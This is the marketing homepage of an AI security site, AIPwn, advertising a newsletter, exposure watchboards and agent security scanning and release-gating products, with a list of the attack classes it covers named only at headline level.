Subscribe

AI SECURITY HUB

Learn. Break. Build. Defend.

Hands-on AI security across research, public exposure tracking, and release infrastructure for real Agent systems.

Prompt InjectionAgent AbuseRAG PoisoningTool CallingOpenClaw Exposure
Read Newsletter →Open Watchboard
Researchattack research and defensive breakdowns
Watchboardspublic evidence surfaces for exposed Agent targets
Infrapolicy, scan, and release gate control plane

SIGNALS

How AIPwn works

The site should not read like a thin company page. It should show a loop: find, explain, and operationalize.

RESEARCH

Attack chains, not generic commentary

We focus on concrete exploit paths: prompt injection, tool abuse, permission overreach, leaked secrets, and exposed endpoints.

Read the briefings →

WATCHBOARDS

Public proof that scanning is happening

OpenClaw watchboards make security results visible, sortable, and shareable instead of burying them in a single report artifact.

Open OpenClaw →

PRODUCT

Turn findings into release control

ClawPlane connects policy, scan, and gate decisions so the same evidence flows into CI, deploy, and public trust surfaces.

Open ClawPlane →

PRODUCTS

What we are building

Everything orbits one goal: make AI systems harder to break and easier to verify.

Newsletter

AI security briefings with real attack chains, defense breakdowns, and practical industry signals.

Live
Subscribe →

ClawPlane

Agent security and release infrastructure. One control plane for policy, scanning, and CI/deploy gates.

Alpha
Open Product Page →

ClawScan

Evidence-rich scanning for repos, skills, MCP servers, and exposed OpenClaw services.

Live Surface
Open Watchboard →

ClawGate

PR, CI, and deploy gate module that blocks risky merges based on policy thresholds and diff-first findings.

Alpha
Join Alpha →

COVERAGE

What we track across the Agent attack surface

The homepage should already tell visitors what problems AIPwn actually understands.

Current focus areas

Prompt Injection

Instruction override, hidden tool abuse, indirect prompt poisoning, and unsafe retrieval flows.

Tool And Runtime Abuse

Shell execution, downloader chains, unsafe subprocess usage, and overly broad permissions.

Secret Exposure

Leaked API keys, tokens in repos, unsafe logs, and public config artifacts.

Public Agent Exposure

OpenClaw services exposed without auth, public docs/openapi, and externally reachable risky interfaces.

Do not ship blind

Subscribe for attack research. Use ClawPlane when you need policy, scan, and gate control in the same release path.

Subscribe Free →Request ClawPlane Alpha